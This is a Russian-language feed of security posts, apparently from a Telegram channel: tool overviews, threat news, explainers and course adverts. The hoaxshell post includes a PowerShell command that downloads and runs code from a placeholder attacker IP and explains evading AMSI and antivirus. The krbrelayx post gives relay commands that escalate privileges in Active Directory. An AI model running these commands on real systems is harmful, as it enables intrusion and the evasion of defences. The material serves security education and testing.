krbrelayx — Набор инструментов для атак на Kerberos и NTLM в Active Directory

krbrelayx — это мощный набор Python-утилит для тестирования безопасности инфраструктуры Active Directory, в частности Kerberos и NTLM-аутентификации. Инструмент позволяет исследовать и эксплуатировать уязвимости, связанные с relay-атаками (Kerberos relay, LDAP relay).

🪛 Основные возможности krbrelayx
➡️ Kerberos Relay Attacks — реализация атак по принципу NTLM relay, но с использованием Kerberos (через S4U2Proxy/S4U2Self).
➡️ LDAP и LDAPS Relay — получение привилегий и добавление аккаунтов через перехваченные тикеты.
➡️ Resource-based Constrained Delegation (RBCD) exploitation — автоматизация добавления себя в делегирование и эскалация прав до Domain Admin.
➡️ Поддержка различных сервисов: LDAP, SMB, HTTP, MSSQL и др.
➡️ Интеграция с другими инструментами: можно использовать вместе с impacket, ntlmrelayx, getST.py и adidnsdump.
➡️ Тонкая настройка сценариев: выбор цели, фильтров LDAP, а также логирование и отладка запросов Kerberos.


⬇️ Установка и запуск
Клонируйте репозиторий:

git clone https://github.com/dirkjanm/krbrelayx.git
cd krbrelayx
pip install -r requirements.txt

Для запуска, например, LDAP-релея:

python3 krbrelayx.py --target ldap://dc01.corp.local --escalate-user attacker

Можно использовать с различными параметрами для указания SPN, делегирования и типов тикетов (TGS, TGT).

Пример для атаки через Kerberos:

python3 krbrelayx.py -t ldap://dc.corp.local --delegate-from victim$ --delegate-to target$ --add-computer attacker$

⚙️ Преимущества krbrelayx
⏺️ Позволяет исследовать реальные Kerberos relay-уязвимости без необходимости ручного построения пакетов.
⏺️ Поддерживает комплексные сценарии атак на делегирование (RBCD, unconstrained и constrained).
⏺️ Совместим с современными версиями Windows Server и Active Directory.

Читать полностью…

Киберпреступления оставляют цифровые следы. Научитесь их находить.

Цифровой криминалист — это тот, кто расследует атаки, восстанавливает данные и делает виртуальный мир безопаснее.

Освойте цифровую криминалистику и реагирование на инциденты в Linux-среде. Старт курса 13 октября!

⌨️ Регистрация здесь

Что вас ждёт на курсе:
🟧 Реальные кейсы, основанные на APT-отчетах
🟧 Полный цикл реагирования на инциденты с помощью opensource-инструментов
🟧 Поиск и анализ артефактов хакеров и вредоносного ПО

Кому подходит курс:
🟧 Аналитикам 1, 2, 3 линии SOC
🟧 Начинающим специалистам в DFIR и Red Team
🟧 Организациям, желающим прокачать команду по реагированию на киберинциденты и Linux-форензику

Хотите научиться расследовать кибератаки и распутывать цифровые следы?
Присоединяйтесь — узнайте всё о форензике. Начать учиться сейчас

🚀 @CodebyManagerBot

Читать полностью…

📱 Банковский Android-троян атакует пожилых людей!

👨‍🦳 Новый Android-троян «Datzbro» обманывает пожилых людей, используя сгенерированные искусственным интеллектом события путешествий в Facebook. Исследователи выявили ранее не выявленный банковский троян для Android под названием Datzbro , который может осуществлять атаки по захвату устройств ( DTO ) и совершать мошеннические транзакции, наживаясь на пожилых людях.

🌐 Компания ThreatFabric заявила, что обнаружила эту вредоносную активность в августе 2025 года после того, как пользователи в Австралии сообщили о мошенниках, управляющих группами в Facebook, рекламирующими «активные поездки для пожилых людей». Среди других территорий, на которые нацелились злоумышленники, — Сингапур, Малайзия, Канада, ЮАР и Великобритания.

📱 Действовали злоумышленники следующим образом: создавали тематические сообщества в Facebook, в которых генерировался контент с помощью ИИ, далее пожилые люди, которые ищут возможности для общения и путешествия, обращались к ним за услугами. После чего с ними связываются через Facebook или WhatsApp, где их просят загрузить APK-файл по вредоносной ссылке (например, «download.seniorgroupapps[.]com»), утверждая, что это позволит им зарегистрироваться на мероприятии, общаться с участниками и отслеживать запланированные мероприятия.

📵 Ниже приведен список вредоносных приложений Android, которые были обнаружены в процессе распространения Datzbro:

Senior Group (twzlibwr.rlrkvsdw.bcfwgozi)
Живые годы (orgLivelyYears.browses646)
ActiveSenior (com.forest481.security)
DanceWave (inedpnok.kfxuvnie.mggfqzhl)
作业帮 (io.mobile.Itool）
麻豆传媒 (fsxhibqhbh.hlyzqkd.aois
麻豆传媒 (mobi.audio.aassistant)
谷歌浏览器 (tvmhnrvsp.zltixkpp.mdok)
MT管理器 (varuhphk.vadneozj.tltldo)
MT管理器 (spvojpr.bkkhxobj.twfwf)
大麦 (mnamrdrefa.edldylo.zish)
MT管理器 (io.red.studio.tracker)

⚠️ На данный момент подобные атаки еще на зафиксированы на территории России, но, по возможности, лучше предостеречь своих близких!

Читать полностью…

➡️ Что такое STIX и TAXII?

❓ Данные термины в киберразведке используются часто вместе, но что это такое и зачем они нужны?

🔺 STIX (Structured Threat Information eXpression) — это стандартный язык для структурированного описания и обмена информацией о киберугрозах. Он предоставляет общую структуру для представления данных об индикаторах компрометации, тактиках, техниках и процедурах угроз, а также участников угроз. Это позволяет организациям более эффективно обмениваться и анализировать разведывательную информацию для улучшения защиты и реагирования на инциденты

🔺 TAXII (Trusted Automated eXchange of Intelligence Information) — это протокол и набор сервисов, который обеспечивает стандартизованный и автоматизированный обмен информацией, представленной в формате STIX, между организациями. TAXII использует HTTPS и RESTful API для передачи данных, обеспечивает обнаружение, управление коллекциями данных и поддерживает различные модели обмена. Это позволяет организациям надежно и эффективно обмениваться актуальной информацией об угрозах в автоматическом режиме.

👀 Получается, что STIX отвечает за структуру и формат описания угроз, а TAXII - за способ передачи информации об угрозах. Именно поэтому они используются совместно для улучшения обмена информации об угрозах. Но как это все выглядит на практике?

Пример STIX:

{
  "type": "bundle",
  "id": "bundle--12345678-1234-1234-1234-123456789abc",
  "objects": [
    {
      "type": "indicator",
      "id": "indicator--abcd1234-5678-90ef-ghij-klmnopqrstuv",
      "created": "2025-09-30T12:00:00Z",
      "modified": "2025-09-30T12:00:00Z",
      "name": "Malicious IP Address",
      "description": "Known IP address associated with malware command and control",
      "pattern": "[ipv4-addr:value = '192.0.2.1']",
      "pattern_type": "stix",
      "valid_from": "2025-09-01T00:00:00Z"
    }
  ]
}

Этот пример описывает "индикатор" — IP-адрес 192.0.2.1, который ассоциируется с вредоносной активностью. В STIX используются объекты с типами, например "indicator", а также указывается паттерн (pattern) для обозначения конкретного признака угрозы.

Читать полностью…

RDWAtool: Аудит и анализ контроллеров домена Active Directory

RDWAtool (Remote Directory Writable Attributes Tool) — утилита, разработанная французским исследователем безопасности p0dalirius. Задача — автоматизировать процесс аудита прав доступа к атрибутам объектов в Active Directory.

Инструмент подключается к контроллеру домена и проверяет, к каким атрибутам (номеру телефона, описанию должности, почтовому адресу) пользователь или компьютер имеют права на запись. Это позволяет быстро ответить на вопросы:
🟧Какие данные в домене я могу изменить?
🟧Не являются ли эти права избыточными и не создают ли они угрозу для безопасности?
🟧Какие атрибуты могут быть использованы злоумышленником для эскалации привилегий или перемещения по сети?

🟧Клонируем репозиторий

git clone https://github.com/p0dalirius/RDWAtool.git

🟧Переходим в директорию с инструментом

cd RDWAtool

🟧Устанавливаем необходимые Python-библиотеки

pip3 install -r requirements.txt

🟧Проверяем

RDWAtool -h

🟧Минимальная команда для запуска требует указания учетных данных пользователя домена и целевого контроллера домена (DC)

python3 rdwatool.py -u 'DOMAIN\Username' -p 'Password' -d 'dc.domain.local'

Где:
-u / --username - имя пользователя в формате DOMAIN\Username
-p / --password - пароль пользователя
-d / --domain - DNS-имя или IP-адрес контроллера домена.

После выполнения команды

RDWAtool

начнет сканирование, выводя в реальном времени список объектов

AD

и записываемых для них атрибутов.

🟧Сканировать только пользователей

python3 rdwatool.py -u 'DOMAIN\User' -p 'Pass' -d 'dc.domain.local' --users

🟧Сканировать только компьютеры

python3 rdwatool.py -u 'DOMAIN\User' -p 'Pass' -d 'dc.domain.local' --computers

🟧RDWAtool применяется в различных сценариях
🟧Red Team - выявляет векторы для эскалации привилегий через записываемые атрибуты для атак (Key Credential Attack, Golden Tickets).
🟧Blue Team - обнаруживает избыточные права в AD для соблюдения Principle of Least Privilege и устранения векторов атак.
🟧Администраторы - анализирует права на запись атрибутов для расследования инцидентов и планирования изменений.

Читать полностью…

📱 Компания Discord опубликовала заявление с подробным разъяснением инцидента безопасности, который произошел с одним из ее сторонних поставщиков услуг по обслуживанию клиентов. В отличие от взлома систем самого Discord, инцидент стал результатом целенаправленной атаки на сотрудника третьей стороны.

🔺Хронология инцидента
Инцидент берет начало не с технического взлома, а с многоэтапной атаки методом социальной инженерии. Злоумышленники, используя методы манипуляции, смогли обманом получить доступ к учетной записи одного из сотрудников сторонней службы поддержки. Это произошло до 5 мая 2023 года, когда команде безопасности Discord официально стало известно о произошедшем.

После компрометации учетной записи злоумышленник получил доступ к тем данным, которые обрабатываются в тикетах службы поддержки. Это означает, что был раскрыт ограниченный объем информации, включающий адреса электронной почты пользователей, обращавшихся в поддержку, содержание их сообщений к операторам, а также любые документы, прикрепленные к этим обращениям.

🔺Важно подчеркнуть, что внутренние системы Discord и основные данные аккаунтов не были затронуты. Расследование не выявило никаких признаков того, что злоумышленник получил доступ к паролям, платежной информации или к личным сообщениям, которыми пользователи обмениваются в дружеских беседах и на серверах.

🔺Реакция и предпринятые меры
Узнав об инциденте, Discord немедленно приступил к серии действий по устранению угрозы и минимизации последствий.
🟣Первым действием стала полная блокировка скомпрометированной учетной записи сотрудника сторонней службы поддержки для предотвращения дальнейшего несанкционированного доступа.
🟣В срочном порядке обслуживание клиентов было переведено на нового поставщика услуг для обеспечения непрерывности работы.
🟣Была запущена целевая рассылка всем пользователям, чьи данные могли быть затронуты инцидентом. Каждому такому пользователю было направлено персональное сообщение с описанием ситуации и рекомендацией проявлять повышенную бдительность к фишинговым письмам, которые могут прийти на адрес электронной почты, указанный в обращении в поддержку.
🟣Компания инициировала работу по усилению систем безопасности и пересмотру процессов взаимодействия с третьими сторонами для предотвращения подобных инцидентов в будущем.

В своем заявлении компания принесла извинения за произошедшее и заверила, что продолжает укреплять как собственные системы безопасности, так и требования к сторонним партнерам, чтобы не допустить подобных инцидентов в будущем.

💬А что думаете вы о данном инциденте?

Читать полностью…

🟧 Что общего у киберпреступника и ethical-хакера? Оба идут к цели по одному и тому же пути, состоящему из пяти ключевых этапов. Давайте разберем этот путь от первого шага до последнего!

Читать полностью…

Исследователь из команды Google Project Zero детально описал новый метод удаленной утечки адресов памяти в операционных системах macOS и iOS. Этот подход позволяет обойти ключевую технологию безопасности — рандомизацию макета адресного пространства (ASLR), — не используя традиционные уязвимости повреждения памяти или атаки по боковым каналам, основанные на времени.

🟧 История открытия
Исследование было инициировано в 2024 году в рамках внутренней дискуссии в Project Zero о поиске новых способов удаленного обхода ASLR на устройствах Apple. Хотя в ходе работы не была выявлена конкретная уязвимая система или приложение в реальном мире, исследователь создал работающий прототип (proof-of-concept) на основе искусственного тестового случая с использованием фреймворка сериализации NSKeyedArchiver в macOS.

Полученные выводы были ответственно раскрыты компании Apple, которая изучила проблему и устранила ее в своих обновлениях безопасности, выпущенных 31 марта 2025 года.

🟧 Механизм атаки
В основе техники лежит предсказуемое поведение процессов сериализации и внутренняя работа объектов NSDictionary (которые, по сути, являются хэш-таблицами) в среде Apple.

Цель атаки

— утечка адреса памяти системного синглтона (уникального объекта)

NSNull

. Адрес этого объекта используется в качестве его хэш-значения. Утечка этого хэш-значения эквивалентна утечке самого адреса объекта, что подрывает защиту

ASLR

для общей области памяти (кэша), в которой он находится.

🟧 Процесс атаки имеет несколько этапов:
🟧Злоумышленник создает сериализованный объект NSDictionary. Этот словарь содержит комбинацию ключей NSNumber (хэш-значения которых можно контролировать) и один ключ NSNull.
🟧Ключи NSNumber подбираются таким образом, чтобы они заняли конкретные «сегменты» (bucket) внутри хэш-таблицы, создавая заранее известную схему заполненных и пустых слотов.
🟧Приложение-жертва десериализирует присланный объект, создавая его копию в своей памяти. Когда это приложение повторно сериализирует объект (например, чтобы отправить его обратно), оно перебирает сегменты хэш-таблицы в предсказуемом порядке.
🟧Позиция, которую ключ NSNull занимает в возвращенных сериализованных данных, указывает на тот сегмент хэш-таблицы, в который он был помещен. Это раскрывает частичную информацию о его адресе в памяти, а именно результат вычисления адрес modulo размер_таблицы.
🟧Для реконструкции полного 64-битного адреса памяти в этой технике применяется китайская теорема об остатках. Злоумышленник отправляет жертве множество словарей разного размера (каждый — с разным простым числом сегментов). Это позволяет собрать несколько различных «остатков» от адреса.

Комбинируя эти результаты, можно вычислить точное местоположение синглтона

NSNull

в памяти, что эффективно обходит защиту

ASLR

для этой области.

🟧 Подытожим
Данное исследование демонстрирует, что использование сырых указателей на объекты (их адресов в памяти) в качестве основы для хэш-значений в структурах данных может привести к прямой утечке конфиденциальной информации, если результат сериализации становится доступен злоумышленнику.

В отличие от классических атак по боковым каналам, которые измеряют разницу во времени выполнения операций, этот метод опирается исключительно на детерминированный (предсказуемый) результат процесса сериализации.

Исследователь отмечает, что наиболее надежным способом защиты является отказ от использования адресов объектов в качестве хэш-ключей или дополнительное хэширование этих адресов с помощью случайной функции, чтобы предотвратить их прямое раскрытие.

Читать полностью…

🟧 Готовы проверить свою кибер-интуицию? Перед вами — зашифрованные термины, с которыми ежедневно сталкиваются специалисты по безопасности. Уловите суть и делитесь версиями в комментариях! 🟧

Читать полностью…

🟧Сдвиг безопасности влево (Shift Security Left)
Практика предполагает интеграцию инструментов безопасности на начальных этапах разработки. Статический анализ безопасности приложений (SAST) выявляет уязвимости (например, SQL-инъекции) непосредственно в исходном коде, а анализ компонентов ПО (SCA) проверяет сторонние библиотеки на известные уязвимости до сборки артефакта.

Это позволяет устранять дефекты при их возникновении, снижая стоимость исправления по сравнению с обнаружением уязвимостей в готовом продукте.

🟧Автоматизация процессов безопасности (Automate Security Processes)
Для соответствия скорости CI/CD-пайплайнов необходима полная автоматизация проверок. Интеграция сканирования инфраструктуры как код (IaC) на этапе планирования развертывания предотвращает создание небезопасно сконфигурированных ресурсов. Автоматическое обнаружение секретов в каждом коммите минимизирует риски утечки учетных данных.

Например, пайплайн может быть автоматически остановлен при обнаружении ключа доступа в коде, что исключает человеческий фактор и ускоряет обратную связь.

🟧Приоритизация на основе рисков (Risk-Based Prioritization)
В условиях ограниченных ресурсов важно фокусироваться на наиболее значимых угрозах. Использование метрик EPSS позволяет оценить вероятность эксплуатации уязвимости, а анализ достижимости определяет возможность активации уязвимого кода в рабочей среде.
Например, уязвимость в недоступном извне административном интерфейсе будет иметь более низкий приоритет по сравнению с уязвимостью на публичной странице аутентификации.

Это позволяет командам оптимально распределять усилия по устранению недостатков.

🟧Автоматическая защита секретов (Automated Secrets Management)
Проактивное управление секретами включает сканирование репозиториев на наличие учетных данных и их автоматический отзыв.

Например, интеграция с системами типа

HashiCorp Vault

позволяет не только выявить случайно закоммиченный токен

API

, но и немедленно аннулировать его, сводя к минимуму окно возможной компрометации до развертывания кода в продуктивной среде.

🟧Контроль безопасности инфраструктуры как код (IaC Security)
Безопасность инфраструктуры должна проверяться на стадии разработки конфигураций. Сканирование шаблонов Terraform или Kubernetes выявляет мисконфигурации, такие как: излишне разрешительные политики безопасности или нешифруемые хранилища данных.

Исправление ошибок на этапе кода предотвращает создание уязвимых сред и обеспечивает соответствие стандартам комплаенс.

🟧Формирование культуры безопасности (Cultivating a Security-First Culture)
Успех DevSecOps зависит от вовлеченности всей команды. Регулярные тренировки по безопасному программированию, внедрение практик code review с фокусом на безопасность и предоставление разработчикам оперативной обратной связи через инструменты способствуют повышению коллективной ответственности.

Когда разработчик сразу видит результаты проверки

SAST

, это ускоряет внедрение лучших практик безопасности.

🟧Повышение видимости с помощью дашбордов и отчетности (Enhanced Visibility and Reporting)
Централизованные дашборды обеспечивают единую точку мониторинга метрик безопасности для всех стейкхолдеров. Например, они могут отображать динамику обнаружения уязвимостей, их критичность и скорость устранения.

Интеграция с системами управления задачами (

Jira

) автоматизирует создание тикетов на исправление, обеспечивая прозрачность процесса управления рисками.

🟧Непрерывный мониторинг пайплайнов (Continuous Pipeline Monitoring)
Практика направлена на обнаружение аномалий в процессах CI/CD. Мониторинг на основе поведенческого анализа выявляет подозрительную активность, например, запуск сборок из неавторизованных источников.

Отслеживание дрейфа конфигураций обеспечивает соответствие пайплайнов политикам безопасности на протяжении всего жизненного цикла.

Читать полностью…

🎃Друзья, напоминаем, на каких курсах начинается обучение в октябре, выбирайте направление и присоединяйтесь!🟧

Старт 2 октября:
🟧 Курс «Тестирование Веб-приложений на проникновение (WAPT)» — отработаем полный цикл тестирования: от разведки до пост-эксплуатации.

Старт 9 октября:
🟧 Курс «Основы программирования на Python» — овладеем самым попуярным ЯП за 2 месяца.

Старт 13 октября:
🟧Курс «Цифровая криминалистика и реагирование на инциденты ОС Linux (DFIR)» — ищем и анализируем следы кибервзломов (анализ артефактов, работа с opensource инструментами).

Старт 20 октября:
🟧 Курс «Специалист центра мониторинга инцидентов информационной безопасности (SOC)» — освоите полный цикл работы: от обнаружения киберугроз до расследования инцидентов.
🟧Курс «OSINT: технология боевой разведки» — освоим профессиональный поиск информации и анализ данные из открытых источников.
🟧 Курс «Анализ защищенности приложений Андроид» — изучим этапы создания мобильного приложения, приемы реверса и возможные уязвимости.

🟧Запишитесь у нашего менеджера @CodebyManagerBot

Или узнайте подробности и программы курсов — на нашем 🟧сайт

Читать полностью…

⚠️ Linux в опасности!

🐧 Агентство по кибербезопасности и защите инфраструктуры США (CISA) 29.09.2025 добавило в свой каталог (KEV) критическую уязвимость в Unix-системах, влияющую на утилиту командной строки Sudo, сославшись на свидетельства её активной эксплуатации.

❗️ Уязвимость имеет идентификатор CVE-2025-32463 с оценкой CVSS: 9.3, которая затрагивает версии Sudo до 1.9.17p1. Обнаружил её исследователь из Stratascale в июле 2025 года.

💻 По заявлению CISA, уязвимость в sudo позволяет злоумышленнику, получивший локальный доступ, использовать опцию sudo -R (—chroot) для запуска произвольных команд от имени пользователя root, даже если они не указаны в файле sudoers.

🛡 На данный момент официального патча, закрывающий данную уязвимость, нет, поэтому рекомендуются принять соответствующие меры для защиты своих сетей.

❓ А как вы планируете защищаться в данном случае?

Читать полностью…

DefectDojo — Платформа управления уязвимостями и DevSecOps

DefectDojo (django-DefectDojo) — это open-source решение для управления безопасностью приложений. Платформа объединяет сканеры, трекинг уязвимостей, автоматизацию, отчёты и аналитику на одной панели. Помогает командам DevSecOps, исследователям и инженерам безопасности управлять рисками, устранять дублирования и ускорять ответ на угрозы.

⚡️ Основные возможности DefectDojo
➡️ Импорт результатов от множества сканеров (SAST, DAST, SCA и др.).
➡️ Объединение и устранение дублирующихся уязвимостей (deduplication) и автоматическое подавление ложных срабатываний.
➡️ Модель «Продукт / Взаимодействие / Engagement» — позволяет отслеживать проект, период сканирования, сравнивать состояния, создавать отчёты по проектам и версиям.
➡️ Интеграции: с более чем 180 инструментами и платформами, включая Jira, репозитории кода, инструменты сканирования, LDAP, OAuth2/SAML и др.
➡️ Отчёты, метрики и визуализация — дашборды, метрики тенденций, отчёты для различных заинтересованных сторон.

⬇️ Установка и запуск
Клонируйте репозиторий:

git clone https://github.com/DefectDojo/django-DefectDojo.git
cd django-DefectDojo

Запуск через Docker Compose (предпочтительный вариант):

docker compose build
docker compose up -d

Администраторские учётные данные автоматически создаются через инициализатор.

⚙️ Преимущества DefectDojo
⏺️ Снижает ручную работу, помогая автоматизировать импорт, triage, отчёты.
⏺️ Централизует управление уязвимостями, предотвращает дубли и «шум» от одинаковых ошибок в разных сканах.
⏺️ Подходит как для малых команд, так и для крупных организаций, за счёт масштабируемости и множества интеграций.
⏺️ Прозрачность и видимость: дашборды, отчёты, метрики помогают донести состояние безопасности до руководства.

Читать полностью…

🍁 Когда за окном холоднее, в Академии становится жарче — потому что осенью начинается новая волна курсов: от Пентеста и DevSecOps до Основ в ИБ и Цифровой Криминалистики.

Что мы предлагаем:

🎃 WAPT — веб-пентест с практикой, где вы не просто читаете про XSS — вы его находите.

Теперь ещё больше практики: +6 новых видео, +16 лабораторных и +15 экзаменационных заданий. Добавлена виртуалка для Mac M-чипов и улучшена стабильность лаборатории.

🎃 DevSecOps — системная безопасность CI/CD, облаков и контейнеров.

Старт первого потока — 10 ноября 2025 со скидкой 10%: 125 990 ₽ 113 391 ₽

🎃 Основы ИБ — идеальный старт, если вы только заходите в профессию, и хотите избежать хаоса.

Курс даст фундамент, с которого начинают карьеру в ИБ. Linux, сети, атаки, защита — всё, без чего не попасть в профессию. А первый поток — уже со скидкой!

И многое другое!

Все курсы включают:
🟧экспертную проверку заданий;
🟧доступ к виртуальным лабораториям;
🟧поддержку от преподавателей с опытом OSCP, CEH, CISSP;
🟧разборы атак и защитных мер, а на WAPT — живые вебинары с куратором!

Смотрите карту курсов ЗДЕСЬ
— и стройте свой путь: от основ до экспертизы.

И помните:
«Лучшее время начать было год назад. Второе лучшее — сейчас!»

Увидимся в лабораториях! 😎
🥇 @CodebyManagerBot

Читать полностью…

🟧 Боитесь автоматизации? Но настоящий риск — это остаться в стороне от парадигмы, которая переопределяет роль security-эксперта от «надзирателя» к «стратегу». Готовы развеять главные мифы и узнать, как использовать эту трансформацию для своего профессионального рывка?

Читать полностью…

🇨🇳 Китайские хакеры используют Zero-day в VMware!

📞 Связанные с Китаем хакеры используют новую уязвимость нулевого дня VMware с октября 2024 года. По данным NVISO Labs , недавно исправленная уязвимость безопасности, затрагивающая Broadcom VMware Tools и VMware Aria Operations, эксплуатировалась как уязвимость нулевого дня с середины октября 2024 года злоумышленником под именем UNC5174.

❗️ Злоумышленники используют уязвимость CVE-2025-41244 с оценкой CVSS: 7,8, эксплуатируя локальную ошибку повышения привилегий в функции get_version(). Затрагиваются такие продукты, как VMware Cloud Foundation, VMware vSphere Foundation, VMware Aria Operations, VMware Telco Cloud Platform и VMware Telco Cloud Infrastructure.

🔎 Исследователь NVISO Максим Тибо обнаружил уязвимость и сообщил о ней 19 мая 2025 года. Компания также заявила, что VMware Tools 12.4.9, входящий в состав VMware Tools 12.5.4, устраняет эту проблему в 32-разрядных системах Windows, а версия open-vm-tools, устраняющая CVE-2025-41244, будет распространяться поставщиками Linux.

💻 По данным NVISO, уязвимость коренится в функции под названием «get_version()», которая принимает шаблон регулярного выражения (regex) в качестве входных данных для каждого процесса с прослушивающим сокетом, проверяет, соответствует ли двоичный файл, связанный с этим процессом, шаблону, и, если соответствует, вызывает команду версии поддерживаемой службы.

💻 Как утверждает эксперт, широкая практика имитации системных двоичных файлов (например, httpd) подчеркивает реальную возможность того, что несколько других видов вредоносного ПО в течение многих лет случайно извлекали выгоду из непреднамеренного повышения привилегий

❗️ Так что, если используете в своих инфраструктурах продукты VMware, то будьте внимательны!

Читать полностью…

Обход защиты с помощью hoaxshell: HTTP-канал для скрытного управления Windows

Специалисты по кибербезопасности традиционно разделяют инструменты для тестирования на проникновение на два типа: мощные, но сложные, или простые, но ограниченные. Hoaxshell — инструмент, который ломает стереотип. Скрипт использует нестандартный подход к работе с PowerShell, превращая его в эффективное средство для моделирования угроз и оценки защищённости инфраструктуры.

📌 Уникальность Hoaxshell
Традиционные методы получения обратного соединения (reverse shell) через PowerShell часто сталкиваются с проблемами: встроенные защитные механизмы Windows (AMSI), системы обнаружения вторжений (IDS) и межсетевые экраны легко распознают и блокируют стандартные шаблоны трафика.
Hoaxshell обходит эти препятствия за счет двух ключевых особенностей:
- В отличие от сырых TCP-сокетов, hoaxshell использует HTTP/S-запросы для коммуникации. Это позволяет ему маскировать свой трафик под легитимную активность веб-браузера или другого приложения, что значительно усложняет его обнаружение.
- Инструмент генерирует команды PowerShell, которые не содержат явных признаков вредоносной активности. Эти команды динамически получают инструкции от сервера, что позволяет обходить статические сигнатуры антивирусов.

⬇️Установка

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

⬇️Проверка

hoaxshell -h

⚪Запуск сервера
Серверная часть hoaxshell запускается на машине тестировщика (атакующего). Самый простой способ — запустить его на всех интерфейсах, указав порт.

sudo python3 hoaxshell.py -s 8080

После запуска скрипт сгенерирует уникальную команду PowerShell, которую необходимо выполнить на целевой машине. Это будет выглядеть примерно так:

PS C:\> $s='http://ВАШ_IP:8080'; $i='UNIQUE_SESSION_ID'; $p='http://proxy-server.com:8080'; iex (New-Object Net.WebClient).DownloadString("$s/index.html")

⚪Вариации для обхода защиты
Для шифрования трафика и лучшей маскировки можно использовать встроенный сервер с SSL.

sudo python3 hoaxshell.py -s 443 -t ssl

В этом случае команда для цели будет использовать

https://

. Если целевая машина использует корпоративный прокси, в команду можно добавить соответствующие параметры.

📌 Меры защиты от инструментов типа hoaxshell
- Мониторинг сетевой активности (выявление регулярных HTTP/S-сессий между внутренними хостами и внешними IP)
- Аудит журналов PowerShell
(контроль событий выполнения внешнего кода (например, через DownloadString))
- Ограничение возможностей PowerShell (использование Constrained Language Mode для блокировки выполнения скриптов)
- Сегментация сети (блокировка несанкционированных исходящих HTTP/S-подключений с рабочих станций)

Читать полностью…

🛠 Мощь и беспомощность пакера UPX

В новой статье мы подробно разбираем UPX - один из самых популярных упаковщиков исполняемых файлов. Это подробный гайд для тех, кто хочет понять, как работает UPX, и научиться распаковывать файлы вручную.

Внутри вас ждет:
🔵Принцип работы UPX. Как упаковщик перестраивает PE-файл и какие изменения вносит в его структуру.
🔵UPX-заголовок. Объяснение структуры заголовка и почему его повреждение делает автоматическую распаковку невозможной.
🔵Ручная распаковка. Пошаговая инструкция по восстановлению Original Entry-Point (OEP) и Import Address Table (IAT) для корректного запуска файла.

📌 Читать статью

#upx #reverse #infosec

Читать полностью…

🤖 ИИ внедряется в работу SOC

📊 Исходя из недавнего исследования Prophet Security, традиционная модель работы SOC уже не выдерживает наплыва работы, накапливая большие объемы оповещения, замедляя расследования и увеличивая стоимость перегруженных команд SOC-аналитиков.

🗣 Опрос проходил среди 282 руководителей служб безопасности компаний из разных отраслей, раскрывая суровую реальность, с которой сталкиваются современные центры безопасности, которые уже не могут скрывать такие серьезные проблемы, как пропуск критических угроз.

📈 В связи с чем компании стали активно внедрять ИИ в работу своих SOC команд. Таким образом ИИ переходит от эксперимента к стратегическому приоритету.

🤖 В настоящее время 55% служб безопасности уже используют ИИ, как ассистента в рабочих процессах для поддержки сортировки оповещений и проведения расследований.

📈 Следующая волна внедрения стремительно приближается. Среди команд, ещё не использующих ИИ, 60% планируют оценить решения SOC на базе ИИ в течение года. Согласно опросу, ожидается, что в ближайшие три года 60% всех рабочих нагрузок SOC будут обрабатываться с помощью ИИ.

⌛️ В качестве метрик успешности внедрения ИИ организации планируют оценивать прогресс по сокращению среднего времени расследования (MTTI) и среднего времени реагирования (MTTR), а также по традиционным показателям закрытия оповещений.

Читать полностью…

Устроиться специалистом по информационной безопасности в Яндекс за несколько дней

Для этого есть отличная возможность: мы приглашаем специалистов с опытом от 2 лет на Week Offer Security 11–17 октября. Всего за неделю вы сможете пройти все собеседования и получить офер в Яндекс.

Как это устроено:

🔸 Регистрируйтесь и отправляйте заявку до 8 октября
🔸 Пройдите две технические секции 11–12 октября
🔸 Познакомьтесь с командами и получите офер 13–17 октября

Для регистрации переходите по ссылке. Удачи!

Читать полностью…

Nuclei: Автоматизация безопасности через шаблоны

Nuclei — инструмент командной строки с открытым исходным кодом для масштабируемого сканирования безопасности на основе шаблонов. Принцип работы основан на использовании централизованной базы шаблонов (формат YAML). Каждый шаблон содержит инструкции для проверки одной конкретной уязвимости, небезопасной конфигурации или технологии.

✅Преимущества
- Шаблоны позволяют минимизировать ложные срабатывания за счет точного описания условий обнаружения
- Сообщество безопасности регулярно создает и обновляет шаблоны для новых уязвимостей
- Поддерживает проверки HTTP, DNS, TCP и рабочих процессов

✨Устанавливаем

go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
nuclei -update-templates

✨Проверяем

nuclei -h

✨Сканируем

nuclei -u example.com -severity critical,high
nuclei -list targets.txt -o results.json -json

🟣Для проверки цели на конкретную уязвимость (например, Log4Shell (CVE-2021-44228)), укажем путь к конкретному шаблону:

nuclei -u https://example.com -t /path/to/nuclei-templates/cves/2021/CVE-2021-44228.yaml

Получаем такой результат:

[CVE-2021-44228] @ https://example.com/api/login
[info] The target is vulnerable to Log4Shell (CVE-2021-44228).
[template] cves/2021/CVE-2021-44228.yaml
[severity] critical

📎Полезные команды
✨Объединение с subfinder и httpx

echo "domain.com" | subfinder | httpx | nuclei -silent

✨Оптимизация скорости

nuclei -list targets.txt -rate-limit 50 -concurrency 10

✨Лимиты для избежания блокировок

nuclei -u example.com -rate-limit 10 -timeout 20

❎Недостатки
- Высокая нагрузка на сеть при агрессивном сканировании
- Риск блокировки IPS/WAF системами при отсутствии настройки лимитов

Читать полностью…

🚩 Новые задания на платформе HackerLab!

👩‍💻 Категория Pentest Machines — Аромат
——————————————

🗂 В архив добавлены задания с прошлых соревнований + райтапы:

🟠Веб - Микробаг
🟠Реверс-инжиниринг - Три Лика Тени

Приятного хакинга!

Читать полностью…

Скучали по неформальным встречам? Тогда вам на Security DrinkUp 15 октября от Авито! ☄️

Некоторые из тем, которые будут там обсуждать в неформальной обстановке:

➡️ WAF или POH? Стоит ли WAF своих денег;
➡️ Нужны ли «апруверы» в заказе доступов;
➡️ DLP: фикция или реальное средство защиты данных организации;
➡️ AI в безопасности и безопасность в AI.

Будет ли что-то кроме дискуссий?

Конечно! Можно будет сыграть в кастомную настолку «Киберлабиринт» и максимально продуктивно понетворкать.

Так что если давно искали, как познакомиться поближе с комьюнити — велком по ссылке на регистрацию!

Читать полностью…

☎️ Хакеры обманом заставляют загружать вредоносную версию Microsoft Team

👩‍💻 Атакующие пользуются доверием пользователей к популярному программному обеспечению, обманным путем заставляя их загружать модифицированную версию Microsoft Team для получения удаленного доступа.

🔍 Злоумышленники используются поисковой оптимизации (SEO) и вредоносную рекламу, чтобы заманить ничего не подозревающих жертв на мошеннические страницы загрузки.

